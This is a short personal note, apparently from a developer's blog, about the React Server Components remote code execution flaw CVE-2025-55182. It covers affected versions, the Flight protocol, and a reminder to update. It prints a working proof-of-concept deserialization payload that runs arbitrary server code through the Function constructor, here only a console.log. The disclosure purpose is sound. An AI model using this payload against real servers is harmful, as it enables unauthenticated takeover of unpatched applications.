ID: I202512092151 Status: idea Tags: Security, Exploit, React Server Components, React, CVE, vulnerability

React2shell CVE-2025-55182

Tweet

The full exploit is better described in this tweet

It is an exploit of React Server Components. It affects React and Next.js. Make sure you are updated to the newest version of both of these. It doesn't matter whether you actually use Server Components: if the package is installed, it is vulnerable.

Versions

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

Most importantly, look at the React blog post to see the versions of Next.js and the other things you need to update.

How it works

The React team built their own protocol called "Flight". This allows you to update the page by inserting a promise into the content that you want to show (oversimplified explanation). You can read more about the Flight protocol / React Server Components in this article, or you can watch Theo's explanation video (from 4:35 to 14:00). Now, this protocol is not a bad thing; it can be used for a lot of good things.

But this protocol can be abused. With the payload below you could execute anything on the server, which in this case is a console.log:

{
    '0': '$1',
    '1': {
        'status':'resolved_model',
        'reason':0,
        '_response':'$4',
        'value':'{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then':'$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix':'console.log(7*7+1)//',
        '_formData':{
            'get':'$3:constructor:constructor'
        },
        '_chunks':'$2:_response:_chunks',
    }
}

This exploit was found by lachlan2k, and you can read more about how to reproduce it and check your repos in his repo.

I am affected, what now

I am not of much help here since I am writing this whilst sleep deprived, at midnight. But I suggest you google.

I do have somewhere to point you to though: this person on Twitter was also affected. He explains a lot in his tweet: https://x.com/duborges/status/1997293892090183772.

More notes

  • On December 5th, Cloudflare went down (for 30m) because they tried to fix this.

References

https://www.cve.org/CVERecord?id=CVE-2025-55182

https://www.youtube.com/watch?v=UiCEejcV5N4

https://x.com/rauchg/status/1997362942929440937

https://x.com/duborges/status/1997293892090183772